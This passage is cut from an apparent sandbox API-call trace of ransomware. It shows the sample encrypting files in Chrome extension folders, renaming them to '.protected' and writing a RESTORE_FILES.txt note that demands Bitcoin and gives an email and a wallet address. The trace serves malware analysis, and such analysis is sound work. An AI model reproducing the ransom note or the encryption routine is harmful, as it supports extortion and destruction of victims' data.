lpOverlapped=0x0) returned 1 [0083.945] CloseHandle (hObject=0x164) returned 1 [0083.945] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0083.945] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0083.945] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk") returned 150 [0083.946] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0083.946] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*") returned 152 [0083.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.946] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.946] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.946] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.946] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.946] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\.") returned 152 [0083.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.946] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.946] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.946] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.946] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\..") returned 153 [0083.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.946] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0083.946] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.946] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.946] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0083.947] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0083.947] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") 
returned 164 [0083.947] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.947] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.948] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.948] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.948] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.948] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.949] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.949] CloseHandle (hObject=0x168) returned 1 [0083.949] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.protected") returned 174 [0083.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.protected")) returned 1 [0083.949] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.949] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.949] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\RESTORE_FILES.txt") returned 168 [0083.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.950] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.950] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.951] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.951] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.951] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.951] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.951] CloseHandle (hObject=0x164) returned 1 [0083.951] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0083.951] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0083.951] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl") returned 150 [0083.951] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0083.951] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0083.951] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*") returned 152 [0083.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.952] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.952] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.952] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.952] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\.") returned 152 [0083.952] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.952] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.952] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.952] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.952] lstrcmpiW (lpString1="..", lpString2="Program Files 
(x86)") returned -1 [0083.952] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.952] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\..") returned 153 [0083.952] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.952] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.952] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.952] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.952] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.952] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.952] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.952] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.953] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.953] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json") returned 164 [0083.954] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.954] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.960] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.960] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.961] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.961] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.961] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.961] CloseHandle (hObject=0x168) returned 1 [0083.961] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.protected") returned 174 [0083.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\messages.json.protected")) returned 1 [0083.962] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0 [0083.962] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\RESTORE_FILES.txt") returned 168 [0083.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.962] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.962] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.963] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.963] WriteFile (in: hFile=0x164, 
